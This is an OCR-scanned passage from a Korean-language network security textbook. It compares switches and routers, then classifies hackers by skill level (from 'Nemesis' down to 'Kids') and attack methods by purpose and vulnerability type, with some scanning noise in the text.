조종(망다리와 교환기)과 망층에서의 통신량조종(경로기)사이의 차이를 인차 알수 있다. 


표 1-4. 망다리(교환기)와 경로기의 비교 


망다리 (교환기) 

경로기 

모든 포구들이 갈은 망주소리용 

모든 포구가 다른 망주소 리용 

MAC 주소에 기초하여 표작성 

망주소에 기초한 표작성 

MAC 주소에 기초한 자료흐름려과 

망 또는 호스트정보에 기초한 
자료흐름려과 

방송프레임을 통과 

방송프레임을 차단 

모르는 주소에로 전송 

모르는 주소에로의 차단 

프레 임 변경없음 

새 로운 머 리부와 꼬리부 만들기 

머리부에 기초하여 전송가능 

전송전에 항상 대기 


계 층-3교환 

교환기와 경로기사이의 차이에 대한 명백한 리해를 가전데 기초하여 표면상으로 이 두 
가지를 서로 맞물리게 하는것으로 보이는 한가지 기술을 고찰하자. 이러한 장치를 설명하 
는데 계층-3교환，교환기경로조종 그리고 경로기교환 등 3가지가 같은 내용으로 쓰이고 
있 다. 

교환경 로기 에 대 해서 고찰해 보자. 이 장치는 보통 표준경 로기 와 같은 기능을 수행한 
다. 하나의 자료프레임이 수신되면 기억기에 보관되고 CRC 검사가 진행된다. 다음에 위 
상구조적 프레 임 을 자료파케 트에 서 제 거한다. 보통의 경 로기 와 꼭같이 교환경 로기 는 자기 
의 경 로조종표를 참고하여 가장 좋은 전달경 로를 결정 하고 자료파케트를 프레 임 으로 재포 
장하며 그것을 전송한다. 

그러면 교환기경 로기는 표준경 로기와 어떻게 다른가? 그것은 이 장치의 덮개 ( hood ) 


에 있다. 그것의 처리는 전용집적회로 ( ASIC ) 장치에 의하여 제공된다. 표준경로가때기모 
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든 처리는 하나의 RISC (축소명령콤퓨터)처리기에 의하여 수행된다. 교환기경로기에서 요 
소들은 그 경로조종과정에서의 특정의 과제를 수행하도록 전용화된다. 그 결과로 처리량 
이 크게 증대된다. 

이 장치 의 실제 적 인 목적 은 표준경 로기 보다 더 빨리 정 보를 통과시키 는데 있 다. 이 것 
을 달성 하기 위하여 제 작자는 처 리 량을 증대 시 키 는데 서 보통의 경 로기 실 현과는 좀 다르게 
하도록 선택할수 있다. 실례로 어떤 실현에서는 그 프레임에 대한 CRC 검사를 하기 위하 
여 들어오는 자료흐름을 완충기억기 에 보관하지 않을수 있다. 일 단 경로결정을 위한 프레 
임정보를 알았다면 장치는 즉시 정보를 다른쪽으로 전송하기 시작한다. 

보안의 견지에서 보면 이것은 항상 좋은것은 아니다. 성능은 높아지지만 차단되여야 할 
자료흐름이 우연히 통과하는 일이 있을수 있다. 교환기경로기의 실제적 인 목적은 성능이므 
로 무엇을 통과시키는가에 대하여서는 보통의 경로기처 럼 구체적으로 따지지 않을수 있다. 

계층-3교환은 계속 발전하여 이제는 오래동안 잘 사용하여 온 경 로기를 교체할수 있 
는것으로 간주되게 되였다. 대부분의 현대적 인 경로기들은 초당 100만파케트이상을 처 리 
할수 있도륵 발전하였다. 보통 매우 높은 통신량은 주로 중추망에서만 요구된다. 현재까 
지 이 것 으로 하여 교환기 는 망의 이 분야에 서 우위 를 차지하였 었 다. 

교환기경로조종은 보통의 교환기의 교체물로서 보안의 견지에서 리로울수 있다. 자료 
흐름을 충돌령 역 이 아니 라 실제 적 인 부분망에 격 리 하는 능력 으로 하여 망의 이 분야에서 전 
체적인 새로운 조종수준을 가능하게 하고있다. 

경 로기 와 류사하게 어 떤 교환기경 로기들은 접 근조종목록을 지 원하는데 이 것은 망관리 
자로 하여금 어느 체계가 매개 부분망들사이에서 통신할수 있으며 그것들이 어떤 봉사를 접 
근할수 있는가를 처 리할수 있게 한다. 이것은 이전의 교환기 가 제 공하는것보다 매우 높은 
수준의 조종이다. 교환기경로조종은 성능을 떨구지 않고 내부망의 보안을 강화하는데 도 
움이 될수 있다. 
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제 2 장. 해킹에 대한 일반적리해 

제1절. 해킹 및 해커의 개념 

정 보보안침해 란 특정한 정보체계 에 대 하여 의도적위협 요소를 발생시 키는 행위를 말한 
다. 특히 이려한 의도적인 위협요소들가운데서 특정한 체계나 망이 공격대상으로 지정되 
여 보관되 거 나 전송중인 정 보의 보안에 문제 가 발생 하게 되 는 경 우를 해 킹 ( hacking ) 이 라 
고 부르며 해 킹 하는 사람을 해 커 ( hacker ) 라고 부른다. 

1990년대에 들어서면서 WWW (World Wide Web ) 를 리용하여 다중매체에 대한 봉사 
가 제 공되 기 시 작하면서 인 터네 트사용이 급격 히 증가하기 시 작하였 다. 인 터네 트사용의 증 
가에 편승하여 일 반기 업 및 공공기 관들에 서 도 인 터네 트를 리용하여 각종 봉사를 제 공하기 
시작하였고 사용자들은 더 많은 봉사를 요구하게 되였다. 봉사를 제공하는 기관들은 보다 
빠르고 안정 한 봉사제 공에 일 차적 인 관심 을 돌렸 기 때 문에 체 계 보안을 위 한 투자는 봉사의 
량적，질적향상을 위하여 투자하는 비용에 비해 상대 적 으로 매 우 적은 상황에 놓이게 되 
였다. 따라서 많은 취 약점 들이 봉사기 에 존재하게 되 였고 해커 들은 이 리 한 보안상 취 약점 
을 리 용하여 해킹을 시작하였다. 봉사제공업체들은 체계 보안의 중요성을 인식하고 과거에 
비해 많은 비 용을 투자하며 체 계와 망을 보호하기 위해 노력 하고는 있으나 해커들은 간단 
한 체 계의 취 약점 을 리용하는 해 킹 기 법 으로부터 최 근 분산화，암호화，대 행체화기법 등이 
적 용된 복잡하면서 도 고도화된 다양한 해 킹방법 을 동원하기때 문에 쉽 게 방어하지 못하고 
있는 조건이다. 

인 터네 트를 리용하여 접 근가능한 거 의 대 부분의 체 계 들이 취 약점 을 가지 고있 다고 볼 
수 있는 상황과 해 킹 시 도를 막기 위하여 사용하는 각종 보안체 계 ( IDS , Firewall 등) 역 
시 완벽하다고 할수 없는 조건에서 고도의 해킹기술을 사용할수 있는 해커들에게는 무방 
비 상태 로 개 방되 여있 다고 말할수 있 다. 

싸이버범죄 에는 많은 종류가 있으나 허 가되지 않은 체계접 근을 통해 불법적 인 행위를 
저지르는 경우가 대부분이 다. 그러 나 아직 까지 정 보보호관련업 체에서는 각종 싸이버범죄 
를 저지 르는 해커들이 과연 어떤 수법을 리 용하여 해킹을 시도하고 그들의 수준은 어느 정 
도 되 는지 를 구체 적 으로 정 의하지 못한 상태 이 다. 

사람들은 흔히 공격자，해커，파괴자라는 말을 같은것으로 쓰고있다. 실례로〈〈우리 
는 해 킹 당했 다.》라는 말은〈〈 우리 는 침 해 당했 다.》는 말과 같은 의 미 를 가지 는것 으로 보 
고있다. 

그러 나 이 세개의 용어는 큰 차이를 가지 고있으며 그 차이를 리해하여 야 누가 망의 보 
안을 돕고 누가 그것 에 침 입하려 하는가를 알수 있 다. 

공격 자는 대 상의 자원을 몸치 거 나 혼란시 키 려 하는 사람이 다. 그들은 기 능 
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퓨터 애 호가이 거 나 수준이 높은 콤퓨터 전문가이 다. 공격 자는 간첩 이 나 도적 과 비 슷하다. 

해커의 원래 의미는 콤퓨터와 망에 대한 깊은 지식을 가지고있는 사람이다. 해커들은 
프로그람이나 간단히 실행시키는것에 만족하지 않으며 그것이 어떻게 동작하는가 하는 구 
체적인 특성까지 다 알려고 한다. 해커는 정보자료만이 아니라 전송기술까지도 알아야 할 
필요를 느끼는 사람이다. 해킹기술은 그의 사람됨과 동기에 따라 긍정적일수도 있고 부정 
적일수도 있다. 

해커들은 보통 주장을 그대 로 받아들이지 않는다. 실례 로 한 판매 자가《우리제품은 100% 
안전하다.》라고 주장하면 해커는 그것을 하나의 도전으로 여길수 있다. 

어떤 정보체계에 대하여 리해를 더 하려고 하는 해커들과 그 지식을 리용하여 체계에 
비법적 또는 비도덕적으로 침투하려하는 해커들사이를 구별하기 위하여 콤퓨터부문의 일 
부 사람들은 후자를 가리켜 《파괴자 ( Cracker ) 》라는 용어를 쓴다. 이것은《해커》라는 
용어의 전통적인 의미를 보존하려는 시도였지만 이러한 시도는 크게 성과를 보지 못하였 
다. 보통 비 법적 으로 체계 에 침 입한자를 통털어 해커 라고 한다. 


2.1.1. 해커의 수준 분류 

해커의 공격으로부터 자신의 체계와 망을 보호하기 위해서는 해커들이 어떠한 방식으 
로 해킹을 시도하는지를 파악하여 그에 대처할수 있어야 한다. 이를 위해서는 해커의 수 
준을 분류하고 매개의 수준에 따르는 해커의 해킹수법을 분류하여 공격자를 정확히 파악 
하는것이 절실한 문제로 제기된다. 그러나 현재까지는 해커의 행동방식을 기준으로 분류 
한 해커분류안은 존재하지만 해커의 구체적 인 해킹수준을 기준으로 분류한 해커분류안은 부 
족한 상태 이 다. 

최 근 인터 네 트를 리 용한 각종 해 킹 및 싸이 버 범죄 가 크게 증대 되 고 있으나 아직 까지 공 
격의 주범 인 해커들의 수준을 파악하지 못한 상황이 다. 과거 에 해커분류를 시도한 경우가 
있었지 만 적용한 분류기준은 대부분 해커들의 행동방식 이 였다. 여기서는 해 킹코드를 작성 
할수 있는 능력에 따라 해커의 능력을 분류하고 그들이 사용할수 있는 해킹수법과 그 수 
준을 평 가한다. 

종전의 해커분류는 해커의 수준을 통한 분류가 아닌 해커의 행동방식에 따른 분류이 
거나 해커와 크랙커를 분류하기 위해 그 단어의 의미만을 강조하여 설명한것이 대부분이 
였 다. 여 기 서 는 해 커 능력 에 대 한 구체 적 인 기 준을 제 시 하고 이 기 준을 바탕으로 해커의 수 
준을 분류한다. 

해커수준분류의 목적은 해커의 수준을 분류함으로써 각이한 수준의 해커가 사용하는 해 
킹기술과 해킹도구의 기술수준을 분류하고 해킹을 방지하기 위한 보안체계의 수준을 분류 
한 후 모든것들을 종합하여 내부망의 보안수준을 측정하기 위한 기초를 마련하기 위해서 
이다. 



서 사용하는 


〈〈해커》라는 단어의 의미는 해킹을 시도하는 모든 사람을 의미한다. 
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1) Gilbert Alaverdian 의 분류방법 

Gilbert Alaverdian 은 행동양식에 기본중점을 두고 해커를 다음과 같이 총 5가지로 분 
류하고있 다. 

一 Elite 해커 

해킹 하려는 체계에 존재 하는 취약점을 찾아내고 그것을 리 용하여 해킹에 성공하는 최 
고 수준의 해커이다. 해킹을 시도하는 목적은 단지 자신이 해당 체계를 아무런 흔적 없이 
해킹할수 있다는것을 확인하기 위해서이다. 

-Semi Elite 해커 

콤퓨터 에 대 한 포괄적 인 지식 이 있고 조작체 계를 리해 하고있으며 조작체계 에 존재하 
는 특정한 취 약점 을 알고 그 취 약점 을 공격할수 있는 해 킹코드를 만들수 있을 정 도의 최 
소한의 지식을 가지고 있다. 이들은 해킹 흔적을 남겨서 추적을 당하기도 한다. 

-Developed Kiddie 해커 

대 부분의 해 킹 수법 들에 대 해 알고있 다. 해 킹 수행코드가 적 용될 수 있 을만한 취 약점 을 
발견할 때까지 여 러 번 시도하다가 체 계침투에 성 공하는 경우도 있다. 보안상 취 약점 을 새 
로 발견하거나 최근 발견된 취약점을 주어진 상황에 맞게 바물만한 실력은 없다. 

-Script Kiddie 해커 

이 해커들은 망이나 조작체계에 대한 기술적인 지식이 부족하여 GUI 조작체계 바깥 
으로 나와본적 이 없다. 이들에게 있어서 해 킹은 보통 잘 알려진 트로이목마를 사용하여 평 
범 한 인 터 네 트사용자를 공격 하고 피 롭히 는것 이 다. 

-Lamer 해 커 

해커는 되고싶지만 경험도 기술도 없다. 이들은 망과 조작체계에 대한 기술적인 지식 
이 없 다. 이 들이 를퓨터 를 사용하는 유일 한 목적 은 오락과 IRC 대 화，특정 한 싸이 트를 찾 
거나 신용카드구입 등이다. 신문，잡지 등의 대중매체를 통하여 해커에 대해 들은바 있는 
이들은 스스로 자신을 Elite 해커로 착각하는 그릇된 우월감에 빠져있다. 트로이쏘프트웨 
어 ， DoS 도구만 있으면 해킹을 할수 있다고 생각하면서 트로이목마나 GUI 조작체계용 해 
킹 도구를 리용한다. 

2) 다른 해커수준 분류방법 

앞서 살펴본 Gilbert Alaverdian 의 분류방법은 해커의 행동방식에 중점을 두고 그 수 
준을 분류한것으로써 해커의 수준을 구분한 구체적인 기준을 제시하지는 못하였다. 여기 
서 는 여 러 가지 구체 적 인 기 준을 제 시하여 크게 3가지 로，그 아래준위 에 서 7가지 로 분류 
한다. 매 개의 분류를 쉽게 리해 하기 위하여 매 수준별 이 름을 정 하였 다. 

여 기서 는 기 본해 킹 실행 코드 (exploit code ) 를 스스로 작성 할수 있는가를 초기，^^ 기 준 
으로 정한다. 여기서 말하는 해킹실행코드라는것은 어떤 취약점이 발견되였을 때;^^! 
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약점을 리용하여 해킹에 성공할수 있도륵 작성한 일종의 프로그람을 의미하는것으로써 취약 
점의 종류와는 상관없이 해당 해킹실행코드를 작성할수 있는 여부에 따라 구분하도록 한다. 

- Wizard ： 해 킹실행 코드작성 가능 

앞서 언급한바와 같이 해킹실행코드작성가능이란 의미는 해킹강도가 낮은 간단한 취 
약점 을 리용하는 해 킹실행 코드뿐만아니 라 완충기 자리넘 침공격 과 같은 프로그람작성 과정 
의 오유를 리용한 공격 과 각종 통신규약의 문제 점 을 리용한 해 킹실행 코드를 작성할수 있 
는 경우를 의미한다. 이렇게 해킹실행코드를 직접 작성하여 해킹할수 있는 수준의 해커를 
“ Wizard ” 라고 부론다. 해 킹실행코드를 작성할수 있는 수준의 해커는 다음의 2가지 수 
준으로 나누어 볼수 있다. 

- Nemesis ： 새 로운 취 약점을 발견하고 그에 대 한 해 킹실행 코드작성 가능 

새로운 취약점을 발견하고 그에 대한 해킹실행코드를 만들수 있는 해커는 최고수준의 
해커 라고 볼수 있 다. 이 수준의 해커 는 자동화，대 행 체화，은닉 화，분산화된 해 킹 도구를 제 
작할수 있는 능력을 가지고있으며 체계에서 실행되는 여러 작업간의 유기적인 관계를 리 
해하고있다. 다른 수준의 해커들과 구별되는 가장 큰 특징은 창발적 인 생각을 할수 있고 문 
제가 생기면 스스로 해결책을 찾아나갈수 있는 능력이 있다는것이다. 이 수준의 해커를 
《 Nemesis 》 라고 부론다. 《 Nemesis 》 라는것의 원래 의미는 고대 그리스신화에 나오는 녀 
신의 이 름으로서 악한 짓 을 저 지 르거 나 오만한 행 동을 하는 인간이 나 신을 처 벌 하는 복수 
의 녀신이 다. 

- Expert ： 발견된 취 약점 에 대 한 해 킹실행코드작성 가능 

이미 발견된 취 약점 에 대 한 해 킹 실행코드를 작성할수 있는 해커는 여 러 가지 조작체 
계에 대해 체계구조를 구체적으로 리해하고있으며 복잡한 망프로그람작성능력 이 있고 체 
계 에서 제 공하는 봉사 및 각종 통신규약들과 프로그람 등의 구조적 인 문제 를 리해 하고 분 
석할수 있는 능력이 있다. 이 수준의 해커를 《 Expert 》 라고 부른다. 

- Guru ： 해킹실행코드의 수정 및 사용가능 

공개된 해킹실행코드를 수정하여 해킹하려는 체계에 적용할수 있고 이것을 통해 해킹 
성공률을 높일수 있는 수준의 해커를 〈〈 Guru 》 라고 부론다. 이 수준의 해커들은 이미 공 
개 된 해 킹 실 행 코드를 해 킹 하려 는 체 계 에 적 용가능하도록 수정 하여 해 킹 성 공률을 상당히 높 
일수 있는 수준인가，성 공을 위해 해 킹실행 코드를 변경 시 키더 라도 성 공률이 높지 않은 수 
준인가에 따라 2가지 수준으로 나누어 볼수 있다. 


- Experienced Technician : 공개된 해 킹 실행코드의 수정 으로 해 킹 가능 
이 수준의 해커는 발표된 해킹실행코드를 해킹하려는 체계에 적용되도록 수정하여 해 
킹 에 성공할수 있는 수준의 해커를 의미 한다. 이 수준의 해커는 여 러 가지 조작체계 에 대 
수준으로 체계구조를 리해하고있으며 각종 통신규약을 리해하고있다. 또한 일 


錢變邊 鍾變變©繼繼 






게 2 광. 해정에 째쐈 聲•連청 4빼 


정한 수준의 망프로그람작성능력 을 가지 고 해 킹 실행 코드자체 를 리 해 하고 매 코드들이 어 
떤 동작을 하는지 알고있다. 만약 해킹하려고하는 대상의 체계에 이미 발표된 취약점이 존 
재하고 그에 대한 해킹실행코드가 존재한다면 해킹은 가능하다. 이 수준의 해커를 
《Experienced Technician 》 이라고 부론다. 

- Technician : 발표된 해 킹실행코드를 수정하여 도 해 킹성공률이 낮은 수준 

이 수준의 해커는 해킹 하려는 체계에 해킹 실행코드를 적용하기 위 하여 몇가지 간단한 
내 용을 수정 하지 만 해 킹 의 성 공가능성 은 매 우 희 박한 수준이 다. 비 록 해 킹 하려 는 대 상체 
계 에 대 한 취 약점조사를 통하여 어 떤 취 약점 이 있는지 확인하고 해 당 취 약점 에 대 한 해 킹 
실행 코드를 찾을수 있는 능력 이 있다할지 라도 만약 얻 은 해 킹실행 코드가 해 킹하려 는 체 계 
에 정확히 일치되는것이 아니면 해킹에 성공할 확률이 낮은 해커이다. 그러나 이러한 수 
준의 해커는 일반적인 체계프로그람작성능력이 있고 대부분의 해킹수법을 리해하고있다. 그 
리고 체계설정과 관련된 간단한 부족점을 리용하여 해킹이 가능하며 기본적인 체계구조를 
리해하고있고 간단한 망프로그람작성능력이 있다. 이러한 수준의 해커를 〈〈 Technician 》 
이 라고 부른다. 해 킹 수법 을 연구해 본 사람은 알수 있겠지 만 해 킹 수법 을 리 해 하는것 과 그 해 
킹수법을 리용하여 실지 해킹에 성공하는것과는 크게 다르다. 

- Script Kiddie ： 해킹실행코드 및 해킹프로그람의 단순한 사용 

발표된 해 킹실행 코드나 각종 해 킹 관련 싸이트에서 얻 을수 있는 각종 프로그람을 단순 
히 사용하는 수준의 해커를 말한다. 물론 이 수준의 해커는 해커라고 부르지 않는다. 대 
부분《크랙커 ( Cracker ) 》라고 부르거 나 과거 분류에 따라 Script kiddie , 혹은《워 너 비 
(want to be , wannabe , 해커가 되고싶은 사람)》라고 부른다. 여기서는 이와 같이 이미 
알려 진 간단한 체 계 설 정 문제 나 쏘프트웨 어 자체 의 취 약점 을 리 용하거 나 이 미 발표된 해 킹 
프로그람을 아무런 수정없이 사용하는 수준의 사람을 « Script kiddie 》 라고 부론다. 

- Scripter ： 공개된 해 킹실행 코드를 수정없 이 그대 로 사용하는 수준 

이 수준의 해커 는 획득한 해 킹 실행 코드를 수정 없 이 실행 하거 나 단순한 각본들을 실 
행시키는데 이 리 한 수준의 해커는 해커 라고 부르지 않는다. 이들은 각종 GUI 형 태 및 UNIX 
해 킹프로그람을 단순히 설치하여 실행할뿐이 다. 이 미 알려져 있는 체계 나 각종 봉사의 취 
약점에 대해 여러가지 명령어들을 리용하거나 웨브열람기상의 단순한 코드조작으로 해킹 
할수 있는 능력은 있으나 해킹실행코드자체를 리해하지는 못한다. 이러한 수준의 해커를 
《 Scripter 》 라고 부르도륵 한다. 물론 이 수준의 해커 역시 해킹실행 코드가 적용될수 있 
는 체계에 대한 해킹을 시도하는 경우에는 해킹이 가능하다. 

- Newbie ： 각종 해 킹프로그람 및 단순한 Unix 명 령 사용가능한 수준 

이 수준의 해 커 는 해 킹 실 행 코드라는것 이 무엇 인지 리 해 하지 못하는 수준으로 해 킹 싸 
이트에서 얻어낸 각종 해킹 프로그람을 단순히 사용하는 수준이다. 처음 해킹 수밥를 jjl 
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기 시작한 이들은 Unix 체계를 사용해본 경험이 있고 몇개의 체계명령어를 사용할수 있으 
며 망과 체계에 대한 약간의 지식을 가지고있지만 해킹에 적용시킬 능력은 없다. 사용하 
는 명령어 자체에 대한 리해 역시 부족하다. 대부분 GUI 형태의 해킹프로그람을 사용한다. 
이러한 수준의 해커를 《 Newbie 》 라고 부른다. 

- Kids ： GUI 형 래 의 해 킹프로그람을 단순히 사용하는 수준 

이 수준의 사람은 봉사거부 ( DoS ) 프로그람이나 통과암호파괴 ( crack ) 도구만 있으면 모 
든 싸이트를 해킹할수 있다고 생각하는 사람으로 망이나 체계에 대한 지식이 전혀 없으며 
단순히 해 킹프로그람을 설 치하여 실행 시켜본다. 또한 이 런 류의 사람이 사용하는 프로그 
람은 GUI 형 래 의 해 킹프로그람으로서 PC 방 등에 트로목마형 래 의 프로그람을 설 치 하고 해 
킹에 성공했다고 생각하는 사람이 다. 해킹과 관련된 지식 이 전혀 없는 상태 이 다. 이 러한 수 
준의 해커를 “ Kids ” 라고 부론다. 

현재 활동중인 거의 대부분의 해커들이 《 Technician 》 수준을 벗 어 나지 못한다. 이 
것은 Gilbert Alaverdian 의 분류에서도 언급된 《Developed Kiddie 》 수준으로 이들은 단 
순히 발표된 해킹실행코드의 작은 수정을 통해 해킹에 종종 성공하기도 하는 수준이다. 

3) 흰모자해커，회색모자해커，검은모자해커 

어떤 프로그람에서 보안상의 취약점을 리용할 방법을 얻은 해커와 그 취약점을 공개 
하여 알려지게 하려는 해커를 흰모자해커라고 부른다. 

그러 나 만일 해 커 가 보안상의 취 약점 을 발견하고 자기 의 개 인적 리 익 을 위 하여 그 
것 을 리용하려 고 한다면 그 해커는 검 은 모자를 쓰고있다고 한다. 

회색모자해커는 낮에는 흰 모자，밤에는 검은 모자를 쓰는 해커이다. 달리 말하면 보 
통 합법적인 보안전문가로 일하지만 자기 시간에는 비법적인 활동을 계속하는 해커이다. 

회색모자로 볼수 있는 한 사람의 실례를 들어보자. 

어 떤 보안전문가가 한 조작체 계 의 불안전한 뒤문을 하나 발견하였 다. 

그는 그것을 공격에 리용하지는 않지만 이 공격에 대하여 자기 의뢰자의 체계를 안전 
하게 하기 위 한 합법 적 인 보수를 요구한다. 달리 말하면 그는 그런 약점 을 그 자체 로 리 
용하지는 않으면서 자기의 개 인적 리 익을 위 하여 그것을 리용하고있는것 이 다. 결과적으로 그 
는 약점 은 그대 로 남겨두고 그것 을 막기 위한 돈을 요구하는것 이 다. 이 전문가는 이 문제 
에서 공개적 인 수리정 비를 위하여 제 작자와 협동하지 않는다. 그것은 제 작자가 수리하지 않 
도륵 하는것이 그의 관심 이기때문이다. 

좀 더 복잡한 문제 로 되 는것 은 많은 사람들이 보안약점 의 세 부를 공개 하는 사람들의 동 
기 를 오해하는것 이 다. 

사람들은 흔히 이 사람들이 이러한 취약점들을 공개함으로써 다른 공격자들을 교육하 
려 한다고 가정 한다. 이것은 진실에 가까울수도 있다. 취 약성정보를 일반에 공개 하는것은 제 
작자와 체계관리자들을 경고하여 그들이 그것을 처리할 필요를 느끼게 한다. 그러나 공개 
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실례로 펜리움이 인텔회사의 최신제품으로 나타났을 때 사용자들은 그 소편의 수값처 
리기부분에서 계산오차를 가져오는 하나의 오유를 발견하였다. 이 문제가 처음 발견되였 
을 때 많은 사람들은 인텔과 직접 접촉하여 그 문제를 알리려고 하였다. 그러나 그들의 주 
장은 거절되거나 랭담한 대접을 받았다. 

오유의 세부가 인터네트를 통하여 방송되고 공개연단들에서 론의되였을 때에야 인텔 
회사는 그 문제를 해결하기 위한 대책을 취하였다. 결국 인텔은 자기의 소편들을 무상으 
로 교체해주기로 하였으나 인텔에 대한 불만은 계속 제기되였다. 

오유들과 약점 들을 공개 적 으로 발표하는것 은 문제 를 해 결 하기 위한 좋은 방법 의 하나 
로 될수 있다. 

우에서 언급한 내용을 종합하면 해커의 수준을《해킹실행코드를 작성할수 있는가?》， 
《해 킹실행 코드를 수정할수 있는가?》라는 기준을 리용하여 크게 3가지 로 분류하고 취 약 
점 발견의 가능성 여부，발견된 취약점을 리용한 해킹실행코드작성의 가능성여부，발표된 
해 킹실행 코드의 수정가능성 여부，각종 해 킹프로그람의 간단한 사용여부， Unix 형 태 의 0 S 
사용경 험 등의 기 준을 리용하여 세 부적 으로 분류하였 다. 이 에 따라서 Wizard , Guru , Scrip 
Kiddie 로 나누고，세부적 으로는 Nemesis ， Expert , Experienced Technician , Technician , 
Scripter , Newbie , Kids 의 총 7 가지로 구분하였다. 

또한 해커 의 행 동방식 에 따라 흰모자해커，회 색모자해커，검 은모자해커 에 대 해서 간 
단히 언급하였다. 

2.1.2. 해킹수법 및 수준의 분류 

1) 종전의 해킹수법 및 수준분류 

종전의 해 킹대응을 위 한 봉사를 제공하는 각종 업체 및 기관에서 주로 사용하고있는 해 
킹수법분류안은 침 입검출체계를 가장 처음으로 만든 Marcus J . Ranum 에 의해 분류된것 
으로서 다음과 같다. 

^ 사용자도용 ( Impersonation ) 

^ SW 보안오유 (SW Vulnerability ) 

^ 완충기 자리 넘 침 취 약점 (Buffer Overflow ) 

亡〒 구성 설 정 오유 (Configuration Vulnerability ) 

亡〒 악성코드 (Malicious Codes ) 

亡〒 통신규약취 약점 (Protocol Infrastructure Error ) 

^ 봉사거 부공격 (Denial of Service Attack ) 

^ E - mail 관련공격 ( E-mail Vulnerability ) 

^ 취 약점 정 보수집 (Vulnerabilities Probing ) 

^ 사회공학 (Social Engineering ) 

이 해 킹 수준분류안은 대 부분의 해 킹 수법 을 포함하고있고 아직 까지 이 분류를 
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용하는것은 큰 문제가 없지만 지난시기 자주 사용되던 여러 해킹수법중에 현재는 거의 사 
용되지 않거나 하나의 큰 분류로 나누기에는 적합치 않은 부분이 있다. 특히 비슷한 종류 
의 다른 해킹수법들이 존재하기때문에 통합시키고 다시 분류해 야 할 부분이 존재한다. 례 
를 들어 E - Mail 관련공격의 경우는 해킹 이 라고 보기에는 문제가 있으며 전자우편폭탄과 같 
은 방법은 일종의 봉사거부공격 이 라고 할수 있다. 또한 완충기 자리넘 침의 경 우에는 이 것 
뿐아니 라 형 식 문자렬 공격 이 나 경 쟁 조건을 리 용한 공격 등을 하나의 공격 형 래 로 분류하여 프 
로그람작성 과정 의 오유를 리용한 해 킹 수법 으로 분류하여 야 한다. 

2) 최근 해킹수법 및 수준의 분류 

해 킹 은 체 계 에 존재 하는 각종 취 약점 을 리 용하여 이 루어 진 다. 따라서 체 계 관리 자에 의 
해 종전에 발표된 취 약점들이 수정된 경우에는 해당 취 약점을 리용할수 없지만 그렇지 않 
은 경우에는 오래된 해킹수법을 그대로 사용할수 있게 된다. 따라서 현재 해커들에 의해 
서 사용되고있는 해 킹수법 에는 오래전에 사용되 던 수법 에서부터 최근에 발표된 복잡하고 고 
도화된 수법 등 매우 다양한 형래가 존재 한다. 여기서는 이러한 해킹 수법을 몇가지로 나 
누어 분류하고 해당 분류안에 포함될수 있는 해킹의 수준을 분류하도록 한다. 그리고 이 
러한 해 킹수준분류를 리용하여 몇가지 해 킹사건의 위험성정도를 분석하고 현재 각종 싸이 
트에서 제 공하고있는 해 킹 수준을 측정한다. 해 킹 사건의 경 우 하나의 해 킹 사건에 여 러 가지 
해킹수법이 포함되는것이 일반적이기때문에 적용될수 있는 가장 높은 준위를 고찰하였다. 


一 해킹수법분류의 기준 

해킹수법들은 현재 알려져있는 여러 해킹수법들의 동작방식 이나 목적，리용하는 취 약 
점 등을 기 준으로 하여 분류한다. 적 용되 는 분류기 준의 우선순위 를 다음과 같이 정 의한다. 

기준 1: 공격의 목적 

기준 2： 리용하는 취약점의 종류 

기준 3： 일련의 해킹과정에 포함될수 있는 여러가지 방법들 

공격의 목적으로는 특정권한획득，정보수집，봉사거부공격 (체계마비) 등이 있을수 있 
고 해킹에 사용되는 취약점의 종류로는 체계 및 봉사설정과 관련된 취약점，프로그람의 오 
유로 인한 취약점，각종 통신규약상의 취약점 등이 있을수 있다. 그리고 일련의 해킹과정 
에 포함될수 있는 여러 방법으로는 악성코드，기타 여러 방법이 포함될수 있다. 실제로 해 
킹수법을 분류할 때 하나의 해킹수법은 여러 해킹분류에 포함될수 있다. 례를 들어 분산 
봉사거 부공격 의 경 우에 는 통신규약상의 문제 점 을 리 용하여 공격 을 실 행 하게 되 는것 이 대 
부분인데 이 경우 사용하는 취약점의 종류에 따른 분류와 공격의 목적에 따른 분류에 포 
함될 수 있 다. 또한 정 보수집 에 리 용되 는 Banner Grabbing 의 경 우에 는 체 계 설 정 과 관련 
된 취약점을 리용하여 정보수집을 하게 되므로 2가지 분야에 포함될수 있다. 이러한 경 
우 우선순위에 따라 해킹수법을 분류하도록 한다. 

대부분의 해킹수법들은 해킹대상체계의 특정권한(관리자 혹은 특정사용자 권한) 


(I 
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을 얻는데 사용되는 수법들이다. 따라서 많은 해킹수법들이 특정권한획득분류에 포함되는 
데 이 경우 그 분류의 효률성이 매우 떨어지게 되므로 기준 1에서 특정권한획득으로 분 
류되는 해킹수법에 대해서는 기준 2를 적용하여 다시 재분류한다. 또한 통신규약의 취약 
점 을 리 용한 정 보수집 례 를 들어 파케 트엿 보기 (packet sniffing ) 등은 정 보수집 의 목적 보 
다는 통신규약의 취약점을 리용한 해킹에 더 가깝기때문에 통신규약의 취약점을 리용한 해 
킹분류에 포함시 킨다. 따라서 봉사거 부공격，정 보수집，체 계 및 봉사설정 의 취 약점，프로 
그람상의 취 약점，통신규약의 취 약점，악성코드，기 타의 총 7가지로 분류한다. 

이와 같이 분류하면 종전의 해킹수법의 분류와 차이가 난다. 

종전의 완충기 자리넘침취 약점은 프로그람작성과정 의 오유 및 프로그람자체 의 문제점 
을 리용하는 해 킹수법 에 포함되 여 삭제 되 고 사용자도용해킹방법 은 특정권한을 획 득하기 위 
한 해 킹 수법 으로 분류되 여 사용자도용해킹방법 들의 특징 에 따라 여 러 해 킹 수법 으로 분산 
된다. 또한 사회 공학적 방법은 특정 한 권한을 얻기 위 한 해 킹수법 이지만 특별한 체계，프 
로그람 혹은 기 타 통신규약의 취 약점 을 리용하는것 이 아니 기 때 문에 기 타에 포함된 다. 

一 해킹수법수준분류의 기준 

해킹수법에 수준을 부여하기 전에 먼저 해킹수법에 대한 수준을 부여하는 목적은 앞 
에 서 언급한 내 부망의 보안평 가의 기 초가 되 기 위한 작업 이 라는것 을 다시한번 강조한다. 따 
라서 해 킹수법수준분류는 이 미 정의한 해커의 수준분류와 호환성 을 유지 하여 야 하기때 문 
에 다음과 같은 기준을 기초로 7개의 준위 로 분류하였다. 

■ 기준 1: 해킹수법의 수준은 어느 준위의 해커가 사용할수 있는가에 따라 결정 

■ 기준 2: 프로그람을 리용하여 높은 수준의 해 킹 수법 을 사용하는 경 우는 해 당 프로 
그람에 적 용된 해 킹 수법 의 수준을 리용하여 분류 

이 와 같은 기 준을 사용하는 리유는 

